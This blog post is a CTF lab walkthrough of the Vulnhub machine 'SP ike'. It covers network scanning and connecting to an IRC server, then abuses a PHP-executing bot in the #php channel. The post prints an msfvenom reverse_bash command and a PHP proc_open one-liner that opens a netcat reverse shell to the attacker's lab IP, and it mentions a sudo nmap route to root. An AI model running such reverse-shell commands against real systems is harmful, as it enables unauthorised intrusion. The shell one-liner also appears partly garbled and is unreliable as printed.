SP ike: Vulnhub Lab Walkthrough

at 5:01 AM Wednesday, May 1, 2019

Hello friends! Today we are going to take another CTF challenge known as “SP ike”. The credit for making this VM machine goes to “Daniel Solstad”. Our goal is to get flags to complete the challenge.
Security Level: Intermediate
Penetrating Methodology:
  • Discovering Targets IP
  • Network scanning (Nmap)
  • Surfing HTTP service port
  • Configuring HEXCHAT IRC Client
  • Connecting to IRC Server
  • Creating PHP Malicious Script using MSFvenom
  • Using Netcat Listener
  • Spawning TTY Shell
  • Getting Root Access
  • Reading Final Flag
Walkthrough
Let’s start off with scanning the network to find our target.
netdiscover



We found our target –> 192.168.1.21
Time to scan the Target’s IP with nmap. Nmap scan result shows FOUR open ports, 80(http), 139(netbios-ssn), 445(netbios-ssn), 6667(irc).
nmap -sV -T4 192.168.1.21



Since port 80 is running HTTP, so we thought of browsing the Target’s IP in our browser. But it is not much of a great help. Moving on.



Even directory scanning using dirb tool was not very useful. At last we are left with IRC chat server on port(6667). So, we used an IRC client Hexchat to connect to the port(6667). First we need to configure Hexchat by Adding a New Profile and Editing Connection Details.




Now Edit the Network ike which we have added and Give the Target’s IP as you can see in the image.



We have successfully connected to IRC Server. And we found something interesting that the server has a channel #php which has a phpbot, I guess it wouldn’t be problem for the phpbot to execute a php script.


We created a msfvenom script to exploit the target machine. We used the reverse_netcat payload to create this script.
msfvenom -p cmd/unix/reverse_bash lhost=192.168.1.34 lport=1234 R



After making a few tries, we finally able to execute our PHP script successfully. To get reverse shell execute the script given below.
!php $s=array(); $p=array(); proc_open("mkfifo /tmp/tsglu; nc 192.168.1.34 1234 0
/tmp/tsglu 2>&1; rm /tmp/tsglu", $s, $p);



Oh Yeah!! We got the reverse shell, but it is not a proper shell. We will spawn a tty shell using python. After doing sudo -l, we saw nmap can be used with root privileges. So to get root, we used commands given below and successfully got root access. Time to read the FLAG!!



Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here
Labels:

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)